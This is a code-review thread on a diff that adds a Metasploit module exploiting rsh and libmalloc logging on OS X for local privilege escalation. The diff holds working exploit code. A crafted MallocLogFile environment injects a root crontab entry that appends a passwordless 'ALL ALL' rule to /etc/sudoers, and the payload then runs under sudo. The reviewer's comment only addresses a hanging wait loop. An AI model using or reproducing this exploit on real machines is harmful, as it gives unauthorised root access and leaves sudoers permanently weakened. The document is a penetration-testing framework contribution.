modules/exploits/osx/local/rsh_libmalloc.rb

```diff
@@ -0,0 +1,203 @@
+      write_file(payload_file, payload_source)
+      vprint_status("Finished writing payload file.")
+    elsif payload.arch.include? ARCH_PYTHON
+      vprint_status("No need to write payload. Will simply execute after exploit")
+      vprint_status("Payload encodeded is #{payload.encoded}")
+    end
+
+    # Run exploit
+    sploit
+
+    # Execute payload
+    print_status('Executing payload...')
+    if payload.arch.include? ARCH_X86_64
+      cmd_exec("sudo chmod +x #{payload_file}; sudo #{payload_file}")
+    elsif payload.arch.include? ARCH_PYTHON
+      cmd_exec("sudo python -c \"#{payload.encoded}\"")
+    end
+  end
+
+  def os_check
+    # Get sysinfo
+    sysinfo = get_sysinfo
+    # Make sure its OS X (Darwin)
+    unless sysinfo["Kernel"].include? "Darwin"
+      print_warning("The target system does not appear to be running OS X!")
+      print_warning("Kernel information: #{sysinfo['Kernel']}")
+      return
+    end
+    # Make sure its not greater than 10.5 or less than 9.5
+    version = sysinfo["ProductVersion"]
+    minor_version = version[3...version.length].to_f
+    unless minor_version >= 9.5 && minor_version <= 10.5
+      print_warning("The target version of OS X does not appear to be compatible with the exploit!")
+      print_warning("Target is running OS X #{sysinfo['ProductVersion']}")
+    end
+  end
+
+  def sploit
+    user = cmd_exec("whoami").split(" ")
+    if user.length > 1 then user = user[1] end
+
+    vprint_status("The current user is #{user}. start of sploit")
+    # Get size of sudoers file
+    sudoer_path = "/etc/sudoers"
+    size = get_stat_size(sudoer_path)
+
+    # Set up the environment and command for spawning rsh and writing to crontab file
+    rb_script = "e={\"MallocLogFile\"=>\"/etc/crontab\",\"MallocStackLogging\"=>\"yes\",\"MallocStackLoggingDirectory\"=>\"a\n* * * * * root echo \\\"ALL ALL=(ALL) NOPASSWD: ALL\\\" >> /etc/sudoers\n\n\n\n\n\"}; Process.spawn(e,[\"/usr/bin/rsh\",\"rsh\"],\"localhost\",[:out, :err]=>\"/dev/null\")"
+    rb_cmd = "ruby -e '#{rb_script}'"
+
+    # Attempt to execute
+    print_status("Attempting to write /etc/crontab...")
+    cmd_exec(rb_cmd)
+    vprint_status("Now to check whether the script worked...")
+
+    # Check whether it worked
+    crontab = cmd_exec("cat /etc/crontab")
+    vprint_status("Reading crontab yielded the following response: #{crontab}")
+    unless crontab.include? "ALL ALL=(ALL) NOPASSWD: ALL"
+      vprint_error("Bad news... it did not write to the file.")
+      fail_with(Failure::NotVulnerable, "Could not successfully write to crontab file.")
+    end
+
+    print_good("Succesfully wrote to crontab file!")
+
+    # Wait for sudoers to change
+    new_size = get_stat_size(sudoer_path)
+    vprint_status("Got sudoers size again")
+    counter = 0
+    wait_time = datastore["WaitTime"]
+    print_status("Waiting for sudoers file to change..")
+    while new_size == size && counter < wait_time
```

Comment:
I got stuck in here indefinitely. My guess during my test run, ```new_size``` was never the same as ```size```.

I suggest wrap around this while loop in a Timeout.timeout block, that way you know for sure it's always going to timeout and exit.

Like this maybe:

```ruby
begin
  Timeout.timeout(datastore['WaitTime']) {
    # Do the get_stat_size thing
  }
rescue Timeout::Error
  # You have reached the max wait time.
  # exit the module or do something
end
```